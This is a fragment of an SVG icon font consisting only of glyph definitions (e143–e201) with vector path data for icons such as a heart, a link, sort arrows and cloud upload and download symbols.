<glyph unicode="&#xe143;" d="M649 949q48 68 109.5 104t121.5 38.5t118.5 -20t102.5 -64t71 -100.5t27 -123q0 -57 -33.5 -117.5t-94 -124.5t-126.5 -127.5t-150 -152.5t-146 -174q-62 85 -145.5 174t-150 152.5t-126.5 127.5t-93.5 124.5t-33.5 117.5q0 64 28 123t73 100.5t104 64t119 20 t120.5 -38.5t104.5 -104zM896 972q-33 0 -64.5 -19t-56.5 -46t-47.5 -53.5t-43.5 -45.5t-37.5 -19t-36 19t-40 45.5t-43 53.5t-54 46t-65.5 19q-67 0 -122.5 -55.5t-55.5 -132.5q0 -23 13.5 -51t46 -65t57.5 -63t76 -75l22 -22q15 -14 44 -44t50.5 -51t46 -44t41 -35t23 -12 t23.5 12t42.5 36t46 44t52.5 52t44 43q4 4 12 13q43 41 63.5 62t52 55t46 55t26 46t11.5 44q0 79 -53 133.5t-120 54.5z" />
<glyph unicode="&#xe144;" d="M776.5 1214q93.5 0 159.5 -66l141 -141q66 -66 66 -160q0 -42 -28 -95.5t-62 -87.5l-29 -29q-31 53 -77 99l-18 18l95 95l-247 248l-389 -389l212 -212l-105 -106l-19 18l-141 141q-66 66 -66 159t66 159l283 283q65 66 158.5 66zM600 706l105 105q10 -8 19 -17l141 -141 q66 -66 66 -159t-66 -159l-283 -283q-66 -66 -159 -66t-159 66l-141 141q-66 66 -66 159.5t66 159.5l55 55q29 -55 75 -102l18 -17l-95 -95l247 -248l389 389z" />
<glyph unicode="&#xe145;" d="M603 1200q85 0 162 -15t127 -38t79 -48t29 -46v-953q0 -41 -29.5 -70.5t-70.5 -29.5h-600q-41 0 -70.5 29.5t-29.5 70.5v953q0 21 30 46.5t81 48t129 37.5t163 15zM300 1000v-700h600v700h-600zM600 254q-43 0 -73.5 -30.5t-30.5 -73.5t30.5 -73.5t73.5 -30.5t73.5 30.5 t30.5 73.5t-30.5 73.5t-73.5 30.5z" />
<glyph unicode="&#xe146;" d="M902 1185l283 -282q15 -15 15 -36t-14.5 -35.5t-35.5 -14.5t-35 15l-36 35l-279 -267v-300l-212 210l-308 -307l-280 -203l203 280l307 308l-210 212h300l267 279l-35 36q-15 14 -15 35t14.5 35.5t35.5 14.5t35 -15z" />
<glyph unicode="&#xe148;" d="M700 1248v-78q38 -5 72.5 -14.5t75.5 -31.5t71 -53.5t52 -84t24 -118.5h-159q-4 36 -10.5 59t-21 45t-40 35.5t-64.5 20.5v-307l64 -13q34 -7 64 -16.5t70 -32t67.5 -52.5t47.5 -80t20 -112q0 -139 -89 -224t-244 -97v-77h-100v79q-150 16 -237 103q-40 40 -52.5 93.5 t-15.5 139.5h139q5 -77 48.5 -126t117.5 -65v335l-27 8q-46 14 -79 26.5t-72 36t-63 52t-40 72.5t-16 98q0 70 25 126t67.5 92t94.5 57t110 27v77h100zM600 754v274q-29 -4 -50 -11t-42 -21.5t-31.5 -41.5t-10.5 -65q0 -29 7 -50.5t16.5 -34t28.5 -22.5t31.5 -14t37.5 -10 q9 -3 13 -4zM700 547v-310q22 2 42.5 6.5t45 15.5t41.5 27t29 42t12 59.5t-12.5 59.5t-38 44.5t-53 31t-66.5 24.5z" />
<glyph unicode="&#xe149;" d="M561 1197q84 0 160.5 -40t123.5 -109.5t47 -147.5h-153q0 40 -19.5 71.5t-49.5 48.5t-59.5 26t-55.5 9q-37 0 -79 -14.5t-62 -35.5q-41 -44 -41 -101q0 -26 13.5 -63t26.5 -61t37 -66q6 -9 9 -14h241v-100h-197q8 -50 -2.5 -115t-31.5 -95q-45 -62 -99 -112 q34 10 83 17.5t71 7.5q32 1 102 -16t104 -17q83 0 136 30l50 -147q-31 -19 -58 -30.5t-55 -15.5t-42 -4.5t-46 -0.5q-23 0 -76 17t-111 32.5t-96 11.5q-39 -3 -82 -16t-67 -25l-23 -11l-55 145q4 3 16 11t15.5 10.5t13 9t15.5 12t14.5 14t17.5 18.5q48 55 54 126.5 t-30 142.5h-221v100h166q-23 47 -44 104q-7 20 -12 41.5t-6 55.5t6 66.5t29.5 70.5t58.5 71q97 88 263 88z" />
<glyph unicode="&#xe150;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM935 1184l230 -249q14 -14 10 -24.5t-25 -10.5h-150v-900h-200v900h-150q-21 0 -25 10.5t10 24.5l230 249q14 15 35 15t35 -15z" />
<glyph unicode="&#xe151;" d="M1000 700h-100v100h-100v-100h-100v500h300v-500zM400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM801 1100v-200h100v200h-100zM1000 350l-200 -250h200v-100h-300v150l200 250h-200v100h300v-150z " />
<glyph unicode="&#xe152;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM1000 1050l-200 -250h200v-100h-300v150l200 250h-200v100h300v-150zM1000 0h-100v100h-100v-100h-100v500h300v-500zM801 400v-200h100v200h-100z " />
<glyph unicode="&#xe153;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM1000 700h-100v400h-100v100h200v-500zM1100 0h-100v100h-200v400h300v-500zM901 400v-200h100v200h-100z" />
<glyph unicode="&#xe154;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM1100 700h-100v100h-200v400h300v-500zM901 1100v-200h100v200h-100zM1000 0h-100v400h-100v100h200v-500z" />
<glyph unicode="&#xe155;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM900 1000h-200v200h200v-200zM1000 700h-300v200h300v-200zM1100 400h-400v200h400v-200zM1200 100h-500v200h500v-200z" />
<glyph unicode="&#xe156;" d="M400 300h150q21 0 25 -11t-10 -25l-230 -250q-14 -15 -35 -15t-35 15l-230 250q-14 14 -10 25t25 11h150v900h200v-900zM1200 1000h-500v200h500v-200zM1100 700h-400v200h400v-200zM1000 400h-300v200h300v-200zM900 100h-200v200h200v-200z" />
<glyph unicode="&#xe157;" d="M350 1100h400q162 0 256 -93.5t94 -256.5v-400q0 -165 -93.5 -257.5t-256.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 165 92.5 257.5t257.5 92.5zM800 900h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5 v500q0 41 -29.5 70.5t-70.5 29.5z" />
<glyph unicode="&#xe158;" d="M350 1100h400q165 0 257.5 -92.5t92.5 -257.5v-400q0 -165 -92.5 -257.5t-257.5 -92.5h-400q-163 0 -256.5 92.5t-93.5 257.5v400q0 163 94 256.5t256 93.5zM800 900h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5 v500q0 41 -29.5 70.5t-70.5 29.5zM440 770l253 -190q17 -12 17 -30t-17 -30l-253 -190q-16 -12 -28 -6.5t-12 26.5v400q0 21 12 26.5t28 -6.5z" />
<glyph unicode="&#xe159;" d="M350 1100h400q163 0 256.5 -94t93.5 -256v-400q0 -165 -92.5 -257.5t-257.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 163 92.5 256.5t257.5 93.5zM800 900h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5 v500q0 41 -29.5 70.5t-70.5 29.5zM350 700h400q21 0 26.5 -12t-6.5 -28l-190 -253q-12 -17 -30 -17t-30 17l-190 253q-12 16 -6.5 28t26.5 12z" />
<glyph unicode="&#xe160;" d="M350 1100h400q165 0 257.5 -92.5t92.5 -257.5v-400q0 -163 -92.5 -256.5t-257.5 -93.5h-400q-163 0 -256.5 94t-93.5 256v400q0 165 92.5 257.5t257.5 92.5zM800 900h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5 v500q0 41 -29.5 70.5t-70.5 29.5zM580 693l190 -253q12 -16 6.5 -28t-26.5 -12h-400q-21 0 -26.5 12t6.5 28l190 253q12 17 30 17t30 -17z" />
<glyph unicode="&#xe161;" d="M550 1100h400q165 0 257.5 -92.5t92.5 -257.5v-400q0 -165 -92.5 -257.5t-257.5 -92.5h-400q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h450q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5h-450q-21 0 -35.5 14.5t-14.5 35.5v100 q0 21 14.5 35.5t35.5 14.5zM338 867l324 -284q16 -14 16 -33t-16 -33l-324 -284q-16 -14 -27 -9t-11 26v150h-250q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5h250v150q0 21 11 26t27 -9z" />
<glyph unicode="&#xe162;" d="M793 1182l9 -9q8 -10 5 -27q-3 -11 -79 -225.5t-78 -221.5l300 1q24 0 32.5 -17.5t-5.5 -35.5q-1 0 -133.5 -155t-267 -312.5t-138.5 -162.5q-12 -15 -26 -15h-9l-9 8q-9 11 -4 32q2 9 42 123.5t79 224.5l39 110h-302q-23 0 -31 19q-10 21 6 41q75 86 209.5 237.5 t228 257t98.5 111.5q9 16 25 16h9z" />
<glyph unicode="&#xe163;" d="M350 1100h400q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-450q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h450q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400 q0 165 92.5 257.5t257.5 92.5zM938 867l324 -284q16 -14 16 -33t-16 -33l-324 -284q-16 -14 -27 -9t-11 26v150h-250q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5h250v150q0 21 11 26t27 -9z" />
<glyph unicode="&#xe164;" d="M750 1200h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -10.5 -25t-24.5 10l-109 109l-312 -312q-15 -15 -35.5 -15t-35.5 15l-141 141q-15 15 -15 35.5t15 35.5l312 312l-109 109q-14 14 -10 24.5t25 10.5zM456 900h-156q-41 0 -70.5 -29.5t-29.5 -70.5v-500 q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v148l200 200v-298q0 -165 -93.5 -257.5t-256.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 165 92.5 257.5t257.5 92.5h300z" />
<glyph unicode="&#xe165;" d="M600 1186q119 0 227.5 -46.5t187 -125t125 -187t46.5 -227.5t-46.5 -227.5t-125 -187t-187 -125t-227.5 -46.5t-227.5 46.5t-187 125t-125 187t-46.5 227.5t46.5 227.5t125 187t187 125t227.5 46.5zM600 1022q-115 0 -212 -56.5t-153.5 -153.5t-56.5 -212t56.5 -212 t153.5 -153.5t212 -56.5t212 56.5t153.5 153.5t56.5 212t-56.5 212t-153.5 153.5t-212 56.5zM600 794q80 0 137 -57t57 -137t-57 -137t-137 -57t-137 57t-57 137t57 137t137 57z" />
<glyph unicode="&#xe166;" d="M450 1200h200q21 0 35.5 -14.5t14.5 -35.5v-350h245q20 0 25 -11t-9 -26l-383 -426q-14 -15 -33.5 -15t-32.5 15l-379 426q-13 15 -8.5 26t25.5 11h250v350q0 21 14.5 35.5t35.5 14.5zM50 300h1000q21 0 35.5 -14.5t14.5 -35.5v-250h-1100v250q0 21 14.5 35.5t35.5 14.5z M900 200v-50h100v50h-100z" />
<glyph unicode="&#xe167;" d="M583 1182l378 -435q14 -15 9 -31t-26 -16h-244v-250q0 -20 -17 -35t-39 -15h-200q-20 0 -32 14.5t-12 35.5v250h-250q-20 0 -25.5 16.5t8.5 31.5l383 431q14 16 33.5 17t33.5 -14zM50 300h1000q21 0 35.5 -14.5t14.5 -35.5v-250h-1100v250q0 21 14.5 35.5t35.5 14.5z M900 200v-50h100v50h-100z" />
<glyph unicode="&#xe168;" d="M396 723l369 369q7 7 17.5 7t17.5 -7l139 -139q7 -8 7 -18.5t-7 -17.5l-525 -525q-7 -8 -17.5 -8t-17.5 8l-292 291q-7 8 -7 18t7 18l139 139q8 7 18.5 7t17.5 -7zM50 300h1000q21 0 35.5 -14.5t14.5 -35.5v-250h-1100v250q0 21 14.5 35.5t35.5 14.5zM900 200v-50h100v50 h-100z" />
<glyph unicode="&#xe169;" d="M135 1023l142 142q14 14 35 14t35 -14l77 -77l-212 -212l-77 76q-14 15 -14 36t14 35zM655 855l210 210q14 14 24.5 10t10.5 -25l-2 -599q-1 -20 -15.5 -35t-35.5 -15l-597 -1q-21 0 -25 10.5t10 24.5l208 208l-154 155l212 212zM50 300h1000q21 0 35.5 -14.5t14.5 -35.5 v-250h-1100v250q0 21 14.5 35.5t35.5 14.5zM900 200v-50h100v50h-100z" />
<glyph unicode="&#xe170;" d="M350 1200l599 -2q20 -1 35 -15.5t15 -35.5l1 -597q0 -21 -10.5 -25t-24.5 10l-208 208l-155 -154l-212 212l155 154l-210 210q-14 14 -10 24.5t25 10.5zM524 512l-76 -77q-15 -14 -36 -14t-35 14l-142 142q-14 14 -14 35t14 35l77 77zM50 300h1000q21 0 35.5 -14.5 t14.5 -35.5v-250h-1100v250q0 21 14.5 35.5t35.5 14.5zM900 200v-50h100v50h-100z" />
<glyph unicode="&#xe171;" d="M1200 103l-483 276l-314 -399v423h-399l1196 796v-1096zM483 424v-230l683 953z" />
<glyph unicode="&#xe172;" d="M1100 1000v-850q0 -21 -14.5 -35.5t-35.5 -14.5h-150v400h-700v-400h-150q-21 0 -35.5 14.5t-14.5 35.5v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100zM700 1000h-100v200h100v-200z" />
<glyph unicode="&#xe173;" d="M1100 1000l-2 -149l-299 -299l-95 95q-9 9 -21.5 9t-21.5 -9l-149 -147h-312v-400h-150q-21 0 -35.5 14.5t-14.5 35.5v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100zM700 1000h-100v200h100v-200zM1132 638l106 -106q7 -7 7 -17.5t-7 -17.5l-420 -421q-8 -7 -18 -7 t-18 7l-202 203q-8 7 -8 17.5t8 17.5l106 106q7 8 17.5 8t17.5 -8l79 -79l297 297q7 7 17.5 7t17.5 -7z" />
<glyph unicode="&#xe174;" d="M1100 1000v-269l-103 -103l-134 134q-15 15 -33.5 16.5t-34.5 -12.5l-266 -266h-329v-400h-150q-21 0 -35.5 14.5t-14.5 35.5v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100zM700 1000h-100v200h100v-200zM1202 572l70 -70q15 -15 15 -35.5t-15 -35.5l-131 -131 l131 -131q15 -15 15 -35.5t-15 -35.5l-70 -70q-15 -15 -35.5 -15t-35.5 15l-131 131l-131 -131q-15 -15 -35.5 -15t-35.5 15l-70 70q-15 15 -15 35.5t15 35.5l131 131l-131 131q-15 15 -15 35.5t15 35.5l70 70q15 15 35.5 15t35.5 -15l131 -131l131 131q15 15 35.5 15 t35.5 -15z" />
<glyph unicode="&#xe175;" d="M1100 1000v-300h-350q-21 0 -35.5 -14.5t-14.5 -35.5v-150h-500v-400h-150q-21 0 -35.5 14.5t-14.5 35.5v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100zM700 1000h-100v200h100v-200zM850 600h100q21 0 35.5 -14.5t14.5 -35.5v-250h150q21 0 25 -10.5t-10 -24.5 l-230 -230q-14 -14 -35 -14t-35 14l-230 230q-14 14 -10 24.5t25 10.5h150v250q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe176;" d="M1100 1000v-400l-165 165q-14 15 -35 15t-35 -15l-263 -265h-402v-400h-150q-21 0 -35.5 14.5t-14.5 35.5v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100zM700 1000h-100v200h100v-200zM935 565l230 -229q14 -15 10 -25.5t-25 -10.5h-150v-250q0 -20 -14.5 -35 t-35.5 -15h-100q-21 0 -35.5 15t-14.5 35v250h-150q-21 0 -25 10.5t10 25.5l230 229q14 15 35 15t35 -15z" />
<glyph unicode="&#xe177;" d="M50 1100h1100q21 0 35.5 -14.5t14.5 -35.5v-150h-1200v150q0 21 14.5 35.5t35.5 14.5zM1200 800v-550q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v550h1200zM100 500v-200h400v200h-400z" />
<glyph unicode="&#xe178;" d="M935 1165l248 -230q14 -14 14 -35t-14 -35l-248 -230q-14 -14 -24.5 -10t-10.5 25v150h-400v200h400v150q0 21 10.5 25t24.5 -10zM200 800h-50q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h50v-200zM400 800h-100v200h100v-200zM18 435l247 230 q14 14 24.5 10t10.5 -25v-150h400v-200h-400v-150q0 -21 -10.5 -25t-24.5 10l-247 230q-15 14 -15 35t15 35zM900 300h-100v200h100v-200zM1000 500h51q20 0 34.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-34.5 -14.5h-51v200z" />
<glyph unicode="&#xe179;" d="M862 1073l276 116q25 18 43.5 8t18.5 -41v-1106q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v397q-4 1 -11 5t-24 17.5t-30 29t-24 42t-11 56.5v359q0 31 18.5 65t43.5 52zM550 1200q22 0 34.5 -12.5t14.5 -24.5l1 -13v-450q0 -28 -10.5 -59.5 t-25 -56t-29 -45t-25.5 -31.5l-10 -11v-447q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v447q-4 4 -11 11.5t-24 30.5t-30 46t-24 55t-11 60v450q0 2 0.5 5.5t4 12t8.5 15t14.5 12t22.5 5.5q20 0 32.5 -12.5t14.5 -24.5l3 -13v-350h100v350v5.5t2.5 12 t7 15t15 12t25.5 5.5q23 0 35.5 -12.5t13.5 -24.5l1 -13v-350h100v350q0 2 0.5 5.5t3 12t7 15t15 12t24.5 5.5z" />
<glyph unicode="&#xe180;" d="M1200 1100v-56q-4 0 -11 -0.5t-24 -3t-30 -7.5t-24 -15t-11 -24v-888q0 -22 25 -34.5t50 -13.5l25 -2v-56h-400v56q75 0 87.5 6.5t12.5 43.5v394h-500v-394q0 -37 12.5 -43.5t87.5 -6.5v-56h-400v56q4 0 11 0.5t24 3t30 7.5t24 15t11 24v888q0 22 -25 34.5t-50 13.5 l-25 2v56h400v-56q-75 0 -87.5 -6.5t-12.5 -43.5v-394h500v394q0 37 -12.5 43.5t-87.5 6.5v56h400z" />
<glyph unicode="&#xe181;" d="M675 1000h375q21 0 35.5 -14.5t14.5 -35.5v-150h-105l-295 -98v98l-200 200h-400l100 100h375zM100 900h300q41 0 70.5 -29.5t29.5 -70.5v-500q0 -41 -29.5 -70.5t-70.5 -29.5h-300q-41 0 -70.5 29.5t-29.5 70.5v500q0 41 29.5 70.5t70.5 29.5zM100 800v-200h300v200 h-300zM1100 535l-400 -133v163l400 133v-163zM100 500v-200h300v200h-300zM1100 398v-248q0 -21 -14.5 -35.5t-35.5 -14.5h-375l-100 -100h-375l-100 100h400l200 200h105z" />
<glyph unicode="&#xe182;" d="M17 1007l162 162q17 17 40 14t37 -22l139 -194q14 -20 11 -44.5t-20 -41.5l-119 -118q102 -142 228 -268t267 -227l119 118q17 17 42.5 19t44.5 -12l192 -136q19 -14 22.5 -37.5t-13.5 -40.5l-163 -162q-3 -1 -9.5 -1t-29.5 2t-47.5 6t-62.5 14.5t-77.5 26.5t-90 42.5 t-101.5 60t-111 83t-119 108.5q-74 74 -133.5 150.5t-94.5 138.5t-60 119.5t-34.5 100t-15 74.5t-4.5 48z" />
<glyph unicode="&#xe183;" d="M600 1100q92 0 175 -10.5t141.5 -27t108.5 -36.5t81.5 -40t53.5 -37t31 -27l9 -10v-200q0 -21 -14.5 -33t-34.5 -9l-202 34q-20 3 -34.5 20t-14.5 38v146q-141 24 -300 24t-300 -24v-146q0 -21 -14.5 -38t-34.5 -20l-202 -34q-20 -3 -34.5 9t-14.5 33v200q3 4 9.5 10.5 t31 26t54 37.5t80.5 39.5t109 37.5t141 26.5t175 10.5zM600 795q56 0 97 -9.5t60 -23.5t30 -28t12 -24l1 -10v-50l365 -303q14 -15 24.5 -40t10.5 -45v-212q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v212q0 20 10.5 45t24.5 40l365 303v50 q0 4 1 10.5t12 23t30 29t60 22.5t97 10z" />
<glyph unicode="&#xe184;" d="M1100 700l-200 -200h-600l-200 200v500h200v-200h200v200h200v-200h200v200h200v-500zM250 400h700q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-12l137 -100h-950l137 100h-12q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5 t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe185;" d="M700 1100h-100q-41 0 -70.5 -29.5t-29.5 -70.5v-1000h300v1000q0 41 -29.5 70.5t-70.5 29.5zM1100 800h-100q-41 0 -70.5 -29.5t-29.5 -70.5v-700h300v700q0 41 -29.5 70.5t-70.5 29.5zM400 0h-300v400q0 41 29.5 70.5t70.5 29.5h100q41 0 70.5 -29.5t29.5 -70.5v-400z " />
<glyph unicode="&#xe186;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 700h-200v-100h200v-300h-300v100h200v100h-200v300h300v-100zM900 700v-300l-100 -100h-200v500h200z M700 700v-300h100v300h-100z" />
<glyph unicode="&#xe187;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 300h-100v200h-100v-200h-100v500h100v-200h100v200h100v-500zM900 700v-300l-100 -100h-200v500h200z M700 700v-300h100v300h-100z" />
<glyph unicode="&#xe188;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 700h-200v-300h200v-100h-300v500h300v-100zM900 700h-200v-300h200v-100h-300v500h300v-100z" />
<glyph unicode="&#xe189;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 400l-300 150l300 150v-300zM900 550l-300 -150v300z" />
<glyph unicode="&#xe190;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM900 300h-700v500h700v-500zM800 700h-130q-38 0 -66.5 -43t-28.5 -108t27 -107t68 -42h130v300zM300 700v-300 h130q41 0 68 42t27 107t-28.5 108t-66.5 43h-130z" />
<glyph unicode="&#xe191;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 700h-200v-100h200v-300h-300v100h200v100h-200v300h300v-100zM900 300h-100v400h-100v100h200v-500z M700 300h-100v100h100v-100z" />
<glyph unicode="&#xe192;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM300 700h200v-400h-300v500h100v-100zM900 300h-100v400h-100v100h200v-500zM300 600v-200h100v200h-100z M700 300h-100v100h100v-100z" />
<glyph unicode="&#xe193;" d="M200 1100h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212v500q0 124 88 212t212 88zM100 900v-700h900v700h-900zM500 500l-199 -200h-100v50l199 200v150h-200v100h300v-300zM900 300h-100v400h-100v100h200v-500zM701 300h-100 v100h100v-100z" />
<glyph unicode="&#xe194;" d="M600 1191q120 0 229.5 -47t188.5 -126t126 -188.5t47 -229.5t-47 -229.5t-126 -188.5t-188.5 -126t-229.5 -47t-229.5 47t-188.5 126t-126 188.5t-47 229.5t47 229.5t126 188.5t188.5 126t229.5 47zM600 1021q-114 0 -211 -56.5t-153.5 -153.5t-56.5 -211t56.5 -211 t153.5 -153.5t211 -56.5t211 56.5t153.5 153.5t56.5 211t-56.5 211t-153.5 153.5t-211 56.5zM800 700h-300v-200h300v-100h-300l-100 100v200l100 100h300v-100z" />
<glyph unicode="&#xe195;" d="M600 1191q120 0 229.5 -47t188.5 -126t126 -188.5t47 -229.5t-47 -229.5t-126 -188.5t-188.5 -126t-229.5 -47t-229.5 47t-188.5 126t-126 188.5t-47 229.5t47 229.5t126 188.5t188.5 126t229.5 47zM600 1021q-114 0 -211 -56.5t-153.5 -153.5t-56.5 -211t56.5 -211 t153.5 -153.5t211 -56.5t211 56.5t153.5 153.5t56.5 211t-56.5 211t-153.5 153.5t-211 56.5zM800 700v-100l-50 -50l100 -100v-50h-100l-100 100h-150v-100h-100v400h300zM500 700v-100h200v100h-200z" />
<glyph unicode="&#xe197;" d="M503 1089q110 0 200.5 -59.5t134.5 -156.5q44 14 90 14q120 0 205 -86.5t85 -207t-85 -207t-205 -86.5h-128v250q0 21 -14.5 35.5t-35.5 14.5h-300q-21 0 -35.5 -14.5t-14.5 -35.5v-250h-222q-80 0 -136 57.5t-56 136.5q0 69 43 122.5t108 67.5q-2 19 -2 37q0 100 49 185 t134 134t185 49zM525 500h150q10 0 17.5 -7.5t7.5 -17.5v-275h137q21 0 26 -11.5t-8 -27.5l-223 -244q-13 -16 -32 -16t-32 16l-223 244q-13 16 -8 27.5t26 11.5h137v275q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe198;" d="M502 1089q110 0 201 -59.5t135 -156.5q43 15 89 15q121 0 206 -86.5t86 -206.5q0 -99 -60 -181t-150 -110l-378 360q-13 16 -31.5 16t-31.5 -16l-381 -365h-9q-79 0 -135.5 57.5t-56.5 136.5q0 69 43 122.5t108 67.5q-2 19 -2 38q0 100 49 184.5t133.5 134t184.5 49.5z M632 467l223 -228q13 -16 8 -27.5t-26 -11.5h-137v-275q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v275h-137q-21 0 -26 11.5t8 27.5q199 204 223 228q19 19 31.5 19t32.5 -19z" />
<glyph unicode="&#xe199;" d="M700 100v100h400l-270 300h170l-270 300h170l-300 333l-300 -333h170l-270 -300h170l-270 -300h400v-100h-50q-21 0 -35.5 -14.5t-14.5 -35.5v-50h400v50q0 21 -14.5 35.5t-35.5 14.5h-50z" />
<glyph unicode="&#xe200;" d="M600 1179q94 0 167.5 -56.5t99.5 -145.5q89 -6 150.5 -71.5t61.5 -155.5q0 -61 -29.5 -112.5t-79.5 -82.5q9 -29 9 -55q0 -74 -52.5 -126.5t-126.5 -52.5q-55 0 -100 30v-251q21 0 35.5 -14.5t14.5 -35.5v-50h-300v50q0 21 14.5 35.5t35.5 14.5v251q-45 -30 -100 -30 q-74 0 -126.5 52.5t-52.5 126.5q0 18 4 38q-47 21 -75.5 65t-28.5 97q0 74 52.5 126.5t126.5 52.5q5 0 23 -2q0 2 -1 10t-1 13q0 116 81.5 197.5t197.5 81.5z" />
<glyph unicode="&#xe201;" d="M1010 1010q111 -111 150.5 -260.5t0 -299t-150.5 -260.5q-83 -83 -191.5 -126.5t-218.5 -43.5t-218.5 43.5t-191.5 126.5q-111 111 -150.5 260.5t0 299t150.5 260.5q83 83 191.5 126.5t218.5 43.5t218.5 -43.5t191.5 -126.5zM476 1065q-4 0 -8 -1q-121 -34 -209.5 -122.5 t-122.5 -209.5q-4 -12 2.5 -23t18.5 -14l36 -9q3 -1 7 -1q23 0 29 22q27 96 98 166q70 71 166 98q11 3 17.5 13.5t3.5 22.5l-9 35q-3 13 -14 19q-7 4 -15 4zM512 920q-4 0 -9 -2q-80 -24 -138.5 -82.5t-82.5 -138.5q-4 -13 2 -24t19 -14l34 -9q4 -1 8 -1q22 0 28 21 q18 58 58.5 98.5t97.5 58.5q12 3 18 13.5t3 21.5l-9 35q-3 12 -14 19q-7 4 -15 4zM719.5 719.5q-49.5 49.5 -119.5 49.5t-119.5 -49.5t-49.5 -119.5t49.5 -119.5t119.5 -49.5t119.5 49.5t49.5 119.5t-49.5 119.5zM855 551q-22 0 -28 -21q-18 -58 -58.5 -98.5t-98.5 -57.5 q-11 -4 -17 -14.5t-3 -21.5l9 -35q3 -12 14 -19q7 -4 15 -4q4 0 9 2q80 24 138.5 82.5t82.5 138.5q4 13 -2.5 24t-18.5 14l-34 9q-4 1 -8 1zM1000 515q-23 0 -29 -22q-27 -96 -98 -166q-70 -71 -166 -98q-11 -3 -17.5 -13.5t-3.5 -22.5l9 -35q3 -13 14 -19q7 -4 15 -4 q4 0 8 1q121 34 209.5 122.5t122.5 209.5q4 12 -2.5 23t-18.5 14l-36 9q-3 1 -7 1z" />
